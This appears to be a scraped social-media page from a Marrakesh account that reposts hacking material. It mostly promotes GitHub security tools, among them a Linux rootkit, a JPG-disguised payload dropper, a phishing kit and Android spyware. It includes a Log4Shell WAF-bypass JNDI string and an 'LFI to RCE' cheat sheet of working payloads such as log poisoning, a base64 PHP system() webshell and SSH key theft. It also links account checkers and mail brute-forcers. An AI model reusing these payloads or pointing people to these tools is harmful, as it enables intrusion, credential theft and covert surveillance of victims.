MPS
Nearby public figures
بوسبير
Medina Rue Bab Agnaw
40034
You may also like
Magma Prototype Studio
J'arrête Facebook.
DOME :-- Un outil d'énumération de sous-domaine.
Caractéristiques:-
1. Facile à utiliser. Installez simplement le requirements.txt et exécutez
2. Analyse active et passive (lire ci-dessus)
3. Plus rapide que les autres outils d'énumération de sous-domaines
4. 7 résolveurs/serveurs de noms différents, y compris google, cloudfare (le plus rapide), Quad9 et cisco DNS (utilisez --resolvers filename.txt pour utiliser une liste personnalisée de résolveurs, un par ligne)
5. Jusqu'à 21 sources OSINT différentes
6. Les sous-domaines obtenus via OSINT sont testés pour savoir s'ils sont vivants (uniquement en mode actif)
7. Prise en charge des sites Web nécessitant un jeton API
8. Détecte quand la clé api ne fonctionne plus (d'autres outils génèrent simplement une erreur et cessent de fonctionner)
9. Détection et contournement des caractères génériques
10. Analyse de port personnalisée et paramètres intégrés pour les ports Top100, Top1000 et Top Web
11. Sortie colorée et non colorée pour une lecture facile
Prise en charge de Windows et Python 2/3 (Python 3 est recommandé)
12. Hautement personnalisable grâce à des arguments
13. Scannez plus d'un domaine simultanément
14. Possibilité d'utiliser des threads pour des analyses bruteforce plus rapides
15. Exportez la sortie dans différents formats tels que txt, json, html
Avis de non-responsabilité : - Ce projet a été créé à des fins éducatives et ne doit pas être utilisé dans des environnements sans autorisation légale.
de téléchargement:-
https://github.com/v4d1/Dome
Hayabus :-- une chasse aux menaces basée sur sigma et un générateur de chronologie d'investigation rapide pour les journaux d'événements Windows écrits en Rust.
Caractéristiques:-
1. Prise en charge multiplateforme : Windows, Linux, macOS
2. Développé en Rust pour être sûr de la mémoire et plus rapide qu'un faucon hayabusa !
3. Prise en charge multi-thread offrant jusqu'à 5 fois plus de vitesse !
4. Crée une chronologie CSV unique et facile à analyser pour les enquêtes médico-légales et la réponse aux incidents
5. Chasse aux menaces basée sur les signatures IoC écrites dans des règles hayabusa faciles à lire/créer/modifier basées sur YML
6. Prise en charge des règles Sigma pour convertir les règles sigma en règles hayabusa
7. Actuellement, il prend en charge le plus de règles sigma par rapport à d'autres outils similaires et prend même en charge les règles de comptage
8. Statistiques du journal des événements (utiles pour obtenir une image des types d'événements et pour régler les paramètres de votre journal)
9. Configuration du réglage des règles en excluant les règles inutiles ou bruyantes
10. Cartographie MITRE ATT&CK
Avis de non-responsabilité : - Ce projet a été créé à des fins éducatives et ne doit pas être utilisé dans des environnements sans autorisation légale.
de téléchargement:-
https://github.com/Yamato-Security/hayabusa
GitHub - Yamato-Security/hayabusa: Hayabusa is a sigma-based threat hunting and fast forensics timeline generator for Windows event logs written in Rust. Hayabusa is a sigma-based threat hunting and fast forensics timeline generator for Windows event logs written in Rust. - GitHub - Yamato-Security/hayabusa: Hayabusa is a sigma-based threat hunting ...
GhostRecon :-- Un framework OSINT mis à jour chaque semaine, avec lequel vous pouvez effectuer des recherches sur des cibles précises, avec de nombreuses fonctionnalités telles que la recherche de personnes, la recherche de criminels ou l'analyse des médias sociaux avec e-mail/téléphone et changeur d'adresse IP.
Avis de non-responsabilité : - Ce projet a été créé à des fins éducatives et ne doit pas être utilisé dans des environnements sans autorisation légale.
# Lien de téléchargement:
https://github.com/DR34M-M4K3R/GhostRecon
GitHub - DR34M-M4K3R/GhostRecon: An OSINT framework updated weekly, wich with you can search on precise targets, with a lot of features like person search, criminal search, or social media scanning with eamail/phone, and ip changer An OSINT framework updated weekly, wich with you can search on precise targets, with a lot of features like person search, criminal search, or social media scanning with eamail/phone, and ip change...
MUI : - Un plugin d'interface graphique pour Binary Ninja pour interagir facilement avec et visualiser les progrès de Manticore.
Avec le projet d'interface utilisateur Manticore (MUI), nous fournissons un plugin d'interface utilisateur graphique pour Binary Ninja pour permettre aux utilisateurs d'interagir facilement avec et de visualiser la progression du moteur d'exécution symbolique Manticore pour l'analyse des contrats intelligents et des binaires natifs.
Caractéristiques:-
1. Trouver le chemin vers cette instruction / Supprimer l'instruction de la liste de recherche
2. Éviter cette instruction / Supprimer l'instruction de la liste à éviter
3. Ajouter/Modifier un crochet personnalisé
4. Résoudre avec Manticore / Arrêter Manticore
Avis de non-responsabilité : - Ce projet a été créé à des fins éducatives et ne doit pas être utilisé dans des environnements sans autorisation légale.
de téléchargement:-
https://github.com/trailofbits/MUI
GitHub - trailofbits/MUI: A GUI plugin for Binary Ninja to easily interact with and view the progress of Manticore A GUI plugin for Binary Ninja to easily interact with and view the progress of Manticore - GitHub - trailofbits/MUI: A GUI plugin for Binary Ninja to easily interact with and view the progress of M...
ImgBackdoor :-- Cachez votre charge utile dans le fichier .jpg.
Ce module prend une image.jpg existante et une payload.ps1 (saisie par l'utilisateur) et construit une nouvelle charge utile (agent.jpg.exe) qui, si elle est exécutée, déclenchera le téléchargement des 2 fichiers précédents stockés dans apache2 (image. jpg + payload.ps1) et exécutez-les.
Ce module modifie également l'icône agent.exe pour qu'elle corresponde à un fichier.jpg Ensuite, utilise la méthode d'usurpation « Masquer les extensions pour les types de fichiers connus » pour masquer l'extension agent.exe.
Toutes les charges utiles (entrée utilisateur) seront téléchargées à partir de notre serveur Web Apache2
et exécuté dans la RAM cible. La seule extension (charge utile saisie par l'utilisateur)
qui nécessitent d'écrire la charge utile sur le disque sont des binaires .exe.
Avis de non-responsabilité : - Ce projet a été créé à des fins éducatives et ne doit pas être utilisé dans des environnements sans autorisation légale.
de téléchargement:-
https://github.com/Tsuyoken/ImgBackdoor
GitHub - Tsuyoken/ImgBackdoor: Hide your payload into .jpg file Hide your payload into .jpg file. Contribute to Tsuyoken/ImgBackdoor development by creating an account on GitHub.
Kekeo : - Une petite boîte à outils pour jouer avec Microsoft Kerberos en C.
C'était le seul générateur/bibliothèque de code que j'ai trouvé pour fonctionner facilement avec le projet Microsoft C.
1. fonctionne sans beaucoup de dépendances ;
2. documentation magique ;
3. soutien merveilleux pour mes questions stupides ;
4. avait un binaire qui fonctionnait seulement quelques heures après le démarrage de mon projet...
Avis de non-responsabilité : - Ce projet a été créé à des fins éducatives et ne doit pas être utilisé dans des environnements sans autorisation légale.
de téléchargement:-
https://github.com/gentilkiwi/kekeo
GitHub - gentilkiwi/kekeo: A little toolbox to play with Microsoft Kerberos in C A little toolbox to play with Microsoft Kerberos in C - GitHub - gentilkiwi/kekeo: A little toolbox to play with Microsoft Kerberos in C
Found a bypass working for a few WAF
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}
Enjoy bounty season with
OffensiveAutoIt : - Notes et expériences sur l'outillage offensif dans AutoIt v3.
Pourquoi AutoIt ?
1. Beaucoup d'exemples en ligne montrant qu'AutoIt est utilisé pour le développement de logiciels malveillants, mais aucune ressource générale que j'ai pu trouver que les personnes novices en matière de sécurité peuvent utiliser pour explorer ses capacités et ses nuances.
2. Possibilité d'appeler directement des fonctions DLL externes et API Windows.
3. Les scripts peuvent être exécutés à l'aide d'AutoIt3.exe (binaire signé numériquement) ou compilés dans des exécutables autonomes.
4. Simplifie l'automatisation et l'interaction de l'interface utilisateur ; Création d'interface graphique, simulation de frappes et de mouvements de souris, manipulation de fenêtres et de processus.
5. Communauté très active et d'innombrables fonctions définies par l'utilisateur (UDF).
Avis de non-responsabilité : - Ce projet a été créé à des fins éducatives et ne doit pas être utilisé dans des environnements sans autorisation légale.
de téléchargement:-
https://github.com/V1V1/OffensiveAutoIt
GitHub - V1V1/OffensiveAutoIt: Offensive tooling notes and experiments in AutoIt v3 (https://www.autoitscript.com/site/autoit/) Offensive tooling notes and experiments in AutoIt v3 (https://www.autoitscript.com/site/autoit/) - GitHub - V1V1/OffensiveAutoIt: Offensive tooling notes and experiments in AutoIt v3 (https://www.a...
Goblyn : -- Un outil Python axé sur l'énumération et la capture des métadonnées des fichiers de sites Web.
Comment ça fonctionne?
Goblyn recherchera les répertoires actifs sur le site Web et énumérera ainsi les fichiers. S'il trouve un fichier, il obtiendra les métadonnées du fichier.
Pourquoi Goblyn ?
1. Prend en charge plusieurs types de fichiers ;
2. Simple à utiliser ;
3. Installation facile ;
4. Rapide.
Avis de non-responsabilité : - Ce projet a été créé à des fins éducatives et ne doit pas être utilisé dans des environnements sans autorisation légale.
de téléchargement:-
https://github.com/loseys/Goblyn
GitHub - loseys/Goblyn: Goblyn is a Python tool focused to enumeration and capture of website files metadata. Goblyn is a Python tool focused to enumeration and capture of website files metadata. - GitHub - loseys/Goblyn: Goblyn is a Python tool focused to enumeration and capture of website files metadata.
Nosferatu - Lsass NTLM Authentication Backdoor Lsass NTLM Authentication Backdoor How it Works First, the DLL is injected into the lsass.exe process, and will begin hooking authentic...
831.51 GB folder on MEGA 26200 files and 2786 subfolders
CVE-2019-12415: XML processing vulnerability in Apache POI - Pentestmag CVE-2019-12415: XML processing vulnerability in Apache POI by Artem Smotrakov Apache POI is a popular Java library for working with …
Source : Frozen Flame
" LFI to RCE "
1. Apache Log Poisoning
GET /show.php?file=/var/log/apache2/access.log&c=ls HTTP/1.1
User-Agent:
2. SSH Log Poisoning
ssh ''.com
/show.php?file=/var/log/auth.log&c=ls
3. SMTP Log Poisoning
telnet target(.)com 25
MAIL FROM:
RCPT TO:
/show.php?file=/var/log/mail.log&c=ls
4. Image Upload
i. Add this to EXIF data of s.png:
ii. Upload the s.png.
iii. /show.php?file=../img/s.png&c=ls
5. /proc/self/environ
GET /show.php?file=../../proc/self/environ&c=ls HTTP/1.1
User-Agent:
If no success then try writing files.
6. php://filter
Read source code, it may contain sensitive data (username/passwords, private keys etc)->RCE
php://filter/convert.base64-encode/resource=index.php
php://filter/read=string.rot13/resource=index.php
"php://filter" is case insensitive. Try URL/Double encoding
7. Zip upload
echo "" > shell.php
zip shell(.)zip shell.php
mv shell(.)zip shell.jpg
rm shell.php
/show.php?file=zip://shell.jpg%23shell.php
8. data://text/plain:
/show.php?file=data://text/plain,
/show.php?file=data://text/plain,
/show.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pO2VjaG8gJ3NoZWxsISc7Pz4=
9. /proc/self/fd/{id}
Include shell in headers (User-Agent, Authorisation, Referrer etc) and access /proc/self/fd/{id}
10. /proc/$PID/fd/$FD
i. Upload a lot of shells.
ii. /show.php?file=/proc/$PID/fd/$FD
11. expect://
/show.php?page=expect://ls
12. input://
POST /index.php?page=php://input HTTP/1.1
13. RCE via vulnerable assert statement
Vulnerable Code: assert("strpos('$file', '..') === false") or die("Hacker!");
Payload: ' and die(system("whoami")) or '
14. Log files:
/var/log/apache/{access.log or error.log}
/var/log/apache2/error.log
/usr/local/{apache or apache2}/log/error_log
/var/log/nginx/{access.log or error.log}
/var/log/httpd/error_log
Insert payload via headers (User-Agent, Authorisation, Referrer etc)
15. Via PHP sessions: https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/
16. Via SSH:
If ssh is active check which user is being used (/proc/self/status & /etc/passwd) and try to access /.ssh/id_rsa
17. vsftpd Log Poisoning:
Try to login (ftp) with the PHP payload in the username and access /var/log/vsftpd.log
18. To automate, Use LFISuite.
Collected from,
https://twitter.com/tuhin1729_/
Happy hacking. ❤️
Upgrade from LFI to RCE via PHP Sessions I recently came across an interesting Local File Inclusion vulnerability in a private bug bounty program which I was able to upgrade to a Remote Code Ex*****on. The interesting fact about this and what makes it different is that the underlying operating system was pretty hardened and almost all usua...
TurboDataMiner :-- L'objectif de cette extension Burp Suite est l'extraction flexible et dynamique, la corrélation et la présentation structurée des informations du projet Burp Suite ainsi que la modification flexible et dynamique à la volée des requêtes HTTP sortantes ou entrantes en utilisant scripts Python.
Ainsi, Turbo Data Miner aidera à obtenir un meilleur et plus rapide.
L'objectif de ces scripts Python est l'extraction, la corrélation et la présentation structurée flexibles et dynamiques des informations de l'état de Burp Suite ainsi que la modification flexible et dynamique à la volée des requêtes HTTP sortantes ou entrantes. Ainsi, Turbo Data Miner vous aidera à mieux comprendre et plus rapidement les données collectées et traitées par Burp Suite.
Avis de non-responsabilité : - Ce projet a été créé à des fins éducatives et ne doit pas être utilisé dans des environnements sans autorisation légale.
de téléchargement:-
https://github.com/chopicalqui/TurboDataMiner
CTF for Beginners
What is CTF and how to get started!
https://dev.to/atan/what-is-ctf-and-how-to-get-started-3f04
https://github.com/Darkerhack/How-to-Start-CTF-from-Scratch-
https://thehackersmeetup.medium.com/beginners-guide-to-capture-the-flag-ctf-71a1cbd9d27c
https://medium.com/hackcura/how-to-prepare-for-ctfs-and-start-playing-ctfs-7e9d1fd169ee
https://infosecwriteups.com/how-to-get-started-in-ctf-complete-begineer-guide-15ab5a6856d
https://infosecwriteups.com/beginners-guide-to-ctfs-c934a0d7f5f9
https://cybertalents.com/blog/getting-started-in-capture-the-flag-ctf-competitions
https://cybersecurity.att.com/blogs/security-essentials/capture-the-flag-ctf-what-is-it-for-a-newbie
https://www.google.com/amp/s/www.infosectrain.com/blog/a-beginners-guide-to-capture-the-flag-ctf-hacking/amp/
5 façons de gagner de l'argent en ligne rapidement
1. TESTER ET ÉVALUER LES SITES WEB POUR DU CASH
2. FAIRE LES TÂCHES DE QUELQU'UN D'AUTRE
3. REMPLISSEZ LES ENQUÊTES
4. MAGASINEZ EN LIGNE, LAISSEZ LA PÂTE ROULER
5. PRENDRE ET VENDRE VOS PHOTOS
😂😂😂
NinjaDroid:-- Ninja Reverse Engineering sur les packages Android APK.
NinjaDroid utilise apktool et dex2jar pour extraire et stocker : -
1. Fichier de rapport JSON, qui contient toutes les informations APK extraites
2. Fichier AndroidManifest.xml (merci à apktool)
3. Fichier de certificat numérique CERT.RSA/DSA
4. fichiers classes.dex
5. fichier .jar traduit (merci à dex2jar)
6. fichiers smali démontés (merci à apktool)
7. assets/ et res/ dossiers avec leur contenu (merci à apktool)
Avis de non-responsabilité : - Ce projet a été créé à des fins éducatives et ne doit pas être utilisé dans des environnements sans autorisation légale.
de téléchargement:-
https://github.com/rovellipaolo/NinjaDroid
Enquêteur judiciaire sur le piratage informatique (CHFI) | Tous les supports de cours🔰
L'enquête médico-légale sur le piratage informatique consiste à détecter les attaques de piratage et à extraire correctement les preuves pour signaler le crime et mener des audits pour prévenir de futures attaques.
Enquêteur judiciaire sur le piratage informatique (CHFI)
01 Introduction à la criminalistique informatique
02 Processus de criminalistique informatique
03 Recherche et saisie
04 Preuve numérique
05 Procédures de premier intervenant
06 Laboratoire de médecine légale
07 Disque dur et systèmes de fichiers
08 Windows Forensics
09 Acquisition et duplication de données
10 Récupération de fichiers et de partitions supprimés
11 Utilisation des données d'accès FTK
12 Utilisation d'Encase
13 pirates de mot de passe
14 Correction du journal
15 Analyse de réseau
16 Attaque sans fil
17 attaques Web
18 Crimes par courrier électronique
19 Enquête mobile
20 Rapport d'enquête
21 Témoin expert
Du télégramme :
⭕️Lien : https://mega.nz/folder/bUxVXB6T
Reptile :-- Linux.
Caractéristiques:-
1. Donnez root aux utilisateurs non privilégiés
2. Masquer les fichiers et répertoires
3. Masquer les processus
4. Se cacher
5. Masquer les connexions TCP/UDP
6. Persistance de démarrage cachée
7. Altération du contenu du fichier
8. Quelques techniques d'obscurcissement
9. Porte dérobée de port ICMP/UDP/TCP
10. Shell TTY/PTY complet avec transfert de fichiers
11. Client pour gérer Reptile Shell
12. Shell se reconnecte toutes les X fois (pas par défaut)
Avis de non-responsabilité : - Ce projet a été créé à des fins éducatives et ne doit pas être utilisé dans des environnements sans autorisation légale.
de téléchargement:-
https://github.com/f0rb1dd3n/Reptile
N'oubliez jamais que votre présence en ligne doit être prise en charge. Faites attention aux détails et soyez présent là où les clients pourraient rechercher ce que vous proposez.
HawkScan :-- Outil de sécurité pour la reconnaissance et la collecte d'informations sur un site Web. (python 3.x).
Caractéristiques spéciales : -
1. Testez la sauvegarde/l'ancien fichier sur tous les fichiers trouvés (index.php.bak, index.php~...)
2. Vérifiez les informations d'en-tête
3. Vérifiez les informations DNS
4. Vérifiez les e-mails sur le site Web et en même temps si des e-mails ont été divulgués (rapport)
5. Détection CMS + version et vulnérabilités
6. Système de sauvegarde (si le script s'est arrêté, il reprend au même endroit)
7. Détection WAF et erreur de réponse au WAF + Test de contournement
8. Vérifiez Github
9. Option --exclude pour exclure la page, l'erreur de code, les octets
10. Option rate-limit si l'application est instable (--timesleep)
11. Arrivée à la waybackmachine
12. Vérifiez si la base de données firebaseio existe et est accessible
13. Rechercher des compartiments S3 dans la page de code source
14. Tester s'il est possible de scanner avec l'hôte "localhost"
15. Essayez différents contournements pour l'erreur de code 403
16. Analyse et analyse JS (option --js)
17. Vérifiez Google Dork
18. Vérifiez l'adresse IP de l'hôte
19. Redimensionnement automatique par rapport à la fenêtre
20. Vérifiez le nom de domaine de sauvegarde (ex : www.domain.com/domain.zip)
21. Vérifiez la connexion socketio
22. Notifier lorsque l'analyse est terminée (ne fonctionne que sur Linux)
Avis de non-responsabilité : - Ce projet a été créé à des fins éducatives et ne doit pas être utilisé dans des environnements sans autorisation légale.
de téléchargement:-
https://github.com/c0dejump/HawkScan
Meilleur livre pour les apprenants Linux pour créer votre propre interface de programmation.
Lien du fichier PDF : https://bit.ly/3xvyqi2
Pot au noir : - Un outil d'ingénierie inverse Flutter/Dart.
Pot au noir est un outil d'ingénierie inverse pour les applications ciblant . Concrètement, il s'agit d'un parseur et d'un extracteur d'informations pour le binaire Android Flutter/Dart, classiquement nommé libapp. Alors, pour toutes les versions de Dart version 2.10. Lorsqu'il est exécuté, il génère un vidage complet de toutes les classes présentes dans l'instantané d'isolat.
Avis de non-responsabilité : - Ce projet a été créé à des fins éducatives et ne doit pas être utilisé dans des environnements sans autorisation légale.
de téléchargement:-
https://github.com/rscloura/Doldrums
SHARK : - L'avenir du phishing avec moins de re**rd.
Un requin est un outil qui vous aidera à faire du phishing de manière avancée afin que personne ne vérifie et n'identifie que vous faites du phishing. ou des données, telles que des noms d'utilisateur, des mots de passe, en se déguisant en une entité digne de confiance dans une communication électronique.Généralement effectué par l'usurpation d'e-mail, la messagerie instantanée et la messagerie texte, l'hameçonnage incite souvent les utilisateurs à saisir des informations personnelles sur un faux site Web qui correspond au l'apparence et la convivialité du site légitime, comme indiqué dans MR ROBOT.
Avis de non-responsabilité : - Ce projet a été créé à des fins éducatives et ne doit pas être utilisé dans des environnements sans autorisation légale.
de téléchargement:-
https://github.com/Bhaviktutorials/shark
Vérificateur de compte Crunchyroll par Golden Bullet
https://crax.pro/resources/crunchyroll-account-checker-by-golden-bullet.1935/
All Mail Brute [Mail Access Checker] par CHF
https://crax.pro/resources/all-mail-brute-mail-access-checker-by-chf.1934/
Lee Software Proxy Checker v1.0
https://crax.pro/resources/lee-software-proxy-checker-v1-0.1933/
Lee Text Tools v1.0 [Combo/Proxy/Texte]
https://crax.pro/resources/lee-text-tools-v1-0-combo-proxy-text.1932/
Erataka té 🐆
𝐋𝐢𝐬𝐭𝐞 𝐝𝐞𝐬 𝐫𝐚𝐜𝐜𝐨𝐮𝐫𝐜𝐢𝐬 𝐜𝐥𝐚𝐯𝐢𝐞𝐫 𝐖𝐨𝐫𝐝
Working with documents
1-Open an Existing document: Ctrl + O
2-Create a new document: Ctrl + N
3-Save the current document: Ctrl + S
4-Open the Save as window: F12
5-Print the current document: Ctrl + P
6-Close the current document: Ctrl + W
7-Split the window: Alt + Ctrl + S
Move around in a document
8-Move the insertion point: Arrow
9-Move a word: Ctrl + Left / Right Arrow
10-Move a paragraph: Ctrl + Up / down arrow
11-Go to the beginning of the current line: Home
12-Go to the beginning of the document: Ctrl + Home
13-Go to the end of the current line: Ctrl + End
14-Go to the end of the document: Ctrl + End.
Modification of documents
14-Cut the current selection: Ctrl + X
15-Copy current selection: Ctrl + C
16-Paste the contents of the clipboard: Ctrl + V
17-Bold: Ctrl + B
18-Italic: Ctrl + I
19-Underline: Ctrl + U
20-Underline words only: Ctrl + Shift + W
21-Center: Ctrl + E
22-Reduce the font: Ctrl + [
23-Enlarge the font: Ctrl +]
24-Change the text to uppercase: Ctrl + Shift + A
25-Change text to lowercase: Ctrl + Shift + K
26-Insert a page break: Ctrl + Enter
27-Add hyperlink: Ctrl + K
Text selection
28-Select the whole document: Ctrl + A
29-Select the text one character at a time: Shift + Arrow
30-Select the text one word at a time: Ctrl + Shift + Arrow
31-Enter selection mode: F8
Using tables
32-Go to the next cell: Tab
33-Go to the previous cell: Shift + Tab
34-Go to the first cell of a line: Alt + Home
35-Go to the last cell of a line: Alt + End
36-Move to the top of a column: Alt + Previous page
37-Move down a column: Alt + Next page
General tasks
38-Undo the last action: Ctrl + Z
39-Repeat last action: Ctrl + Y
40-Assist: F1
41-Zoom: Alt + W, Q
42-Cancel: Esc
These keyboard shortcuts are the ones I use most often. There are of course other shortcuts that you can see by going to Microsoft Word's built-in help function (shortcut key F1) and looking for keyboard shortcuts. Hope these shortcut keys can help you improve your efficiency when using Microsoft Word.
WAI2K : -- Un outil d'automatisation de première ligne pour filles.
L'objectif principal de cet outil est d'étudier l'efficacité de l'utilisation de diverses techniques de vision par ordinateur pour automatiser et optimiser divers aspects des jeux vidéo. Toute utilisation de cet outil est à vos risques et périls. Personne ne sera responsable de tout ce qui vous arrivera à vous ou à votre propre compte, à l'exception de vous-même.
Caractéristiques:-
1. Soutien logistique
2. Soutien au combat (limité aux cartes mises en œuvre)
3. Cadavre traînant
4. Amélioration automatique
5. Démontage automatique
6. Rapports de combat automatique, faites faire des heures supplémentaires à Kalina !
7. Simulations de combat automatique
8. Intégration de Discord
9. Peut fonctionner en arrière-plan sans prendre en charge la souris du bureau
Avis de non-responsabilité : - Ce projet a été créé à des fins éducatives et ne doit pas être utilisé dans des environnements sans autorisation légale.
de téléchargement:-
https://github.com/waicool20/WAI2K
Spyware Android : - Application Web Rails pour espionner les appareils .
Le projet est un logiciel espion Android basé sur une console web, qui permet d'accéder à distance aux fonctionnalités d'un smartphone : contacts, SMS, caméra, microphone, système de fichiers, etc.
L'outil:-
1. Utilisez des conteneurs Docker pour simuler un environnement Kali Linux avec le framework
2. Utilisez les appels RPC pour communiquer avec le framework Metasploit
3. Utilisez ADB pour installer la charge utile sur l'appareil cible (l'appareil doit être sur le même réseau local)
Avis de non-responsabilité : - Ce projet a été créé à des fins éducatives et ne doit pas être utilisé dans des environnements sans autorisation légale.
https://github.com/CanciuCostin/andro
Click here to claim your Sponsored Listing.
Videos (show all)
Category
Contact the public figure
Website
Address
Rue Beni Marine, Poste Du Maroc
Marrakesh
23016
الفخارة
Marrakesh, 40150
تذكر ، ما دمت تتنفس ، لم يفت الأوان أبدًا لبدء بداية جديدة